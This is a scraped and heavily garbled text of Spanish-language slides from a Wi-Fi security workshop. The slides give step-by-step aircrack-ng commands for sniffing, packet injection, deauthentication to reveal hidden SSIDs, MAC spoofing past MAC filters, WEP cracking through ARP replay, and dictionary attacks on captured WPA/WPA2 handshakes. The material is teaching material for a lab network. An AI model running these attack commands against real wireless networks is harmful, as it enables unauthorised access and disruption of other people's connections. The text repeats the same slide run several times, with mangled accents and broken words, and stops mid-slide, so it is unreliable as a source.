Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 41: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194

Interface en modo Monitor

bull Teclea ifconfig

bull Comprueba que existe la interface mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694

llave

bull

Se utilizan las combinaciones de frases deldiccionario

Conectaacutendonos con WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794

Conectaacutendonos con WEP

bull

Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12

bull Para comprobar tecleamos iwconfig wlan0

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894

Conectaacutendonos con WPA

bull

Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado

wpa-suppconf

bull Teclear wpa_passphrase ldquoWirelessLabpassword gt

etcwpa_supplicantwpa_supplicantconf

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994

Conectaacutendonos con WPA

Conectaacutendonos con WPA

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094

Conectaacutendonos con WPA

bull

Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf

Utilizando el cliente DHCP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194

Utilizando el cliente DHCP

bull

Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0

Queacute aprendimos

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294

Queacute aprendimos

Gracias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394

Gracias

Dr Eduardo Ceh Varela

eduardocehutmetropolitanaedumx

Referencias

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494

Referencias

bull

httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-

informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida

bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works

bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml

bull CASP Study Guidebull BackTrack 5 Wireless Beginners

Page 42: Taller-inSeguridad WIFI.pdf

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294

Iniciando Wireshark

bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el

mensaje de que se ejecutaraacute como root

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394

Monitoreo con Wireshark

bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494

Monitoreo con Wireshark

bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la

ventana de central

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594

Canales

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694

Viendo paquetes no encriptados

bull

Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0

(MAC del AP)

bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794

Ligando al Canal

bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11

bull Confirmar tecleando iwconfig mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894

Sniffing de paquetes

bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter

ndash (wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x20)

ndash Tipos

bull Management (wlanfctype == 0)

bull Control (wlanfctype == 1)

bull Data (wlanfctype == 2)

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994

Filtros

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094

Captura Filtrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194

Inyectando paquetes a la red

bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype==0x08)

bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a

aabbccddeeff mon0

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294

Viendo los paquetes inyectados

bull Regresa al Wireshark debes de ver muchospaquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394

Queacute apredimos

V- Saltaacutendose la autenticacioacuten

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494

V Saltaacutendose la autenticacioacuten

WLAN

bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles

bull Se veraacuten diferentes esquemas y coacutemo saltarlos

ndash Descubrimiento de SSIDs

ndash Saltaacutendose filtros por MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594

SSIDs Ocultos

bull Con Wireshark podemos ver el SSID

l

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694

SSID Ocultos

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794

Teacutecnica Pasiva

bull Esperar a que se conecte alguacuten cliente a la WLAN

eacute i i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894

Teacutecnica Activa

bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff

mon0

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994

Monitoreo con Wireshark

M i Wi h k

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094

Monitoreo con Wireshark

bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp

(wlanfctype_subtype == 0x08)

Fil d MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194

Filtrado por MAC

bull Solo la MAC Address permitidas se conectan alared

E t d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294

Encontrando la MAC

bull

Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0

bull Anotamos la MAC del cliente

C biaacute d l MAC

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394

Cambiaacutendonos la MAC

bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0

bull Teclear ifconfig wlan0 up

Q eacute di

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494

Queacute aprendimos

VI F ll d i ioacute WLAN

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594

VI- Fallas de encripcioacuten WLAN

bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten

bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)

ndash WiFi Protected Access (WPA)

ndash WiFi Protected Access v2 (WPAv2)

Wi d E i l t P i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694

Wired Equivalent Privacy

bull Vulnerado desde el 2000

WEP

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794

WEP

bull RC4 cifrado por corriente (stream cipher )

bull Llave (key) conocida por el cliente y el AP

bull

Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits

bull El problema es el tamantildeo limitado de los IV

WEP I i i d l aacuteli i

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894

WEP ndash Iniciando el anaacutelisis

bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0

WEP Preparando la captura

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994

WEP - Preparando la captura

bullTeclear airodump-ng mon0 para detectar el AP

bull Teclear airodump-ng - -bssid aabbccddeeff - -

chanell 11 - -write WEPCrackingDemo mon0

WEP Capturando los paquetes

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094

WEP ndash Capturando los paquetes

WEP Detectando al cliente

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194

WEP ndash Detectando al cliente

bull

Detectamos cuando un cliente se conecta a lared utilizando WEP

WEP Archivos generados

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294

WEP ndash Archivos generados

bull

Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394

WEP ndash Creando maacutes traacutefico

bull

Necesitamos generar traacutefico para obtener maacutescapturas en Data

bull Se utilizaraacuten paquetes ARP para generar traacutefico

bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0

WEP Creando maacutes traacutefico

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494

WEP ndash Creando maacutes traacutefico

bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594

WEP - Encontrando la llave

bull

Teclear aircrack-ng WEPCrackingDemo-01cap

WEP Encontrando la llave

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694

WEP ndash Encontrando la llave

bull

Paquetes requeridos gt= 100 K

Tiempo de un video

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794

Tiempo de un video

bull

Mientras esperamos veamos un video

Seguridad en redes Wi-Fi (intypedia)

bull Intypedia es una enciclopedia online de

seguridad de informacioacuten

WEP Llave Encontrada

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894

WEP ndash Llave Encontrada

WPAWPA2

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994

WPAWPA2

bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)

bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)

bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash

Pre-Shared Key (PSK)

bull Vulnerables a ataques de diccionario

WPAWPA2 Handshake

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094

WPAWPA2 - Handshake

WPAWPA2 ndash El ataque

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194

WPAWPA2 ndash El ataque

WPAWPA2 ndash Iniciando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294

anaacutelisis

bull

Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0

WPAWPA2 ndash Esperando al

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394

cliente

bull

Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten

bull WPA Handshake

WPAWPA2 ndash Preparando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494

diccionario

bull

Teclearlspentestpasswordswordlistdarkc0delst

WPAWPA2 ndash Usando el

7162019 Taller-inSeguridad WIFIpdf

httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594

diccionario

bull Teclear aircrack-ng WPACrackingDemo-01cap ndash

w pentestpasswordswordlistsdarkc0delst

WPAWPA2 ndash Obteniendo la

